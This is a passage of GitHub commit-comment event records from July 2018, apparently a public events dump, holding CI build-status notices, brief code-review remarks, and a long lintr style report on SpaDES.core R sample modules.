{"id":"7939430901","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29646182,"position":null,"line":null,"path":null,"commit_id":"96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013","created_at":"2018-07-09T18:47:01Z","updated_at":"2018-07-09T18:47:01Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - i386-Windows-7-VisualStudio-14: Build Failed\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 298\n * Failed: 327\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-57.47%25-red.png)</a> \n"}},"created_at":"2018-07-09T18:47:01Z"}
{"id":"7939430947","type":"CommitCommentEvent","actor":{"login":"Davmburu12"},"repo":{"name":"kipkurui/Python4Bioinformatics"},"payload":{"comment":{"id":29646183,"position":null,"line":null,"path":null,"commit_id":"d2447da076c1d40879cf9b6fbad93c0ab5992180","created_at":"2018-07-09T18:47:02Z","updated_at":"2018-07-09T18:47:02Z","author_association":"NONE","body":"Kindly your notes are not accessible while i am at home."}},"created_at":"2018-07-09T18:47:02Z"}
{"id":"7939431783","type":"CommitCommentEvent","actor":{"login":"loumalouomega"},"repo":{"name":"KratosMultiphysics/Kratos"},"payload":{"comment":{"id":29646185,"position":19,"line":64,"path":"kratos/sources/connectivity_preserve_modeler.cpp","commit_id":"4fa11a387aaf25121be19982c9f7a684709c6a35","created_at":"2018-07-09T18:47:12Z","updated_at":"2018-07-09T18:47:12Z","author_association":"MEMBER","body":"KRATOS_INFO"}},"created_at":"2018-07-09T18:47:12Z"}
{"id":"7939433088","type":"CommitCommentEvent","actor":{"login":"jamesmbell"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29646187,"position":null,"line":null,"path":null,"commit_id":"c33766f2fc94189f66eb9a8287a5e0ea2ea35786","created_at":"2018-07-09T18:47:26Z","updated_at":"2018-07-09T18:47:26Z","author_association":"CONTRIBUTOR","body":"I'll revert the change to e2spt_extract.py."}},"created_at":"2018-07-09T18:47:26Z"}
{"id":"7939439174","type":"CommitCommentEvent","actor":{"login":"pmelange"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29646198,"position":4,"line":27,"path":"defaults/freifunk-berlin-olsrd-defaults/uci-defaults/freifunk-berlin-olsrd-defaults","commit_id":"f49fadfda0f19283b081be92acb2bbcf785bf2bb","created_at":"2018-07-09T18:48:41Z","updated_at":"2018-07-09T18:48:41Z","author_association":"NONE","body":"Check out lines 521 to 547 in /lib/functions/olsrd.sh\r\n\r\nThis, I think, would be the ideal place to determine the proper name for the pid file "}},"created_at":"2018-07-09T18:48:41Z"}
{"id":"7939439659","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29646199,"position":null,"line":null,"path":null,"commit_id":"00afc5d0142415c35da6e07f32e89ddd695208f0","created_at":"2018-07-09T18:48:47Z","updated_at":"2018-07-09T18:48:47Z","author_association":"COLLABORATOR","body":"<h3>Fix #1490: core/NumericInput inputRef (#2649)</h3>\n\nPreview: <strong><a href='https://17924-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://17924-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://17924-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-09T18:48:47Z"}
{"id":"7939447629","type":"CommitCommentEvent","actor":{"login":"nighto"},"repo":{"name":"blastrock/pkgj"},"payload":{"comment":{"id":29646215,"position":null,"line":null,"path":null,"commit_id":"2e89b1edb134e0235d51f52007cf28ae3f3ab8be","created_at":"2018-07-09T18:50:22Z","updated_at":"2018-07-09T18:50:22Z","author_association":"NONE","body":"Very good, thank you. :)\r\nChangelog is not appearing on [Release page](https://github.com/blastrock/pkgj/releases/tag/v0.27), though."}},"created_at":"2018-07-09T18:50:22Z"}
{"id":"7939447747","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29646217,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-09T18:50:23Z","updated_at":"2018-07-09T18:50:23Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-09T18:50:23Z"}
{"id":"7939450484","type":"CommitCommentEvent","actor":{"login":"MatFillion"},"repo":{"name":"nventive/Uno"},"payload":{"comment":{"id":29646223,"position":41,"line":132,"path":"doc/articles/faq.md","commit_id":"f60d4f55d2ce008cf155a0b791ec10907a71293e","created_at":"2018-07-09T18:50:52Z","updated_at":"2018-07-09T18:50:52Z","author_association":"CONTRIBUTOR","body":"attached property"}},"created_at":"2018-07-09T18:50:52Z"}
{"id":"7939451400","type":"CommitCommentEvent","actor":{"login":"SteveMoto"},"repo":{"name":"vlachoudis/bCNC"},"payload":{"comment":{"id":29646226,"position":null,"line":null,"path":null,"commit_id":"1e0d58222d278d0ef29c6bae1ef4a3e9131ea690","created_at":"2018-07-09T18:51:01Z","updated_at":"2018-07-09T18:51:01Z","author_association":"CONTRIBUTOR","body":":-1: "}},"created_at":"2018-07-09T18:51:01Z"}
{"id":"7939454817","type":"CommitCommentEvent","actor":{"login":"gvanem"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":29646231,"position":null,"line":null,"path":null,"commit_id":"8272ec50f02bd5277bdad09a98ddfc8c6d68a979","created_at":"2018-07-09T18:51:42Z","updated_at":"2018-07-09T18:51:42Z","author_association":"MEMBER","body":"Why this Unicode junk?\r\n```raw\r\n∩╗┐#ifndef HEADER_CURL_SETUP_H\r\n#define HEADER_CURL_SETUP_H\r\n```\r\nInvisible here at Github, but present in the stored files."}},"created_at":"2018-07-09T18:51:42Z"}
{"id":"7939458178","type":"CommitCommentEvent","actor":{"login":"thomcc"},"repo":{"name":"ncalexan/application-services"},"payload":{"comment":{"id":29646240,"position":null,"line":null,"path":null,"commit_id":"fce4e23222e00c41bc11f141e2b7fcf679b05a2d","created_at":"2018-07-09T18:52:22Z","updated_at":"2018-07-09T18:52:22Z","author_association":"NONE","body":"The idea was that you'd use StoreError here https://github.com/ncalexan/application-services/blob/logins/sync15-adapter/src/error.rs#L108-L109\r\n\r\nIt's not clear to me how to avoid this being tedious for users though, I suspect if we implemented From for failure::Error it would be easy for us to accidentally use outside of the store, and we could have some other part of the adapter accidentally emitting StoreErrors because of a couple implicit conversions gone wrong.\r\n\r\nI'm open to suggestions here though. There might be a way to do this such that we could type erase it later without much work."}},"created_at":"2018-07-09T18:52:22Z"}
{"id":"7939458201","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29646239,"position":null,"line":null,"path":null,"commit_id":"9835dc24345167370987c6895000957753189c43","created_at":"2018-07-09T18:52:21Z","updated_at":"2018-07-09T18:52:21Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) 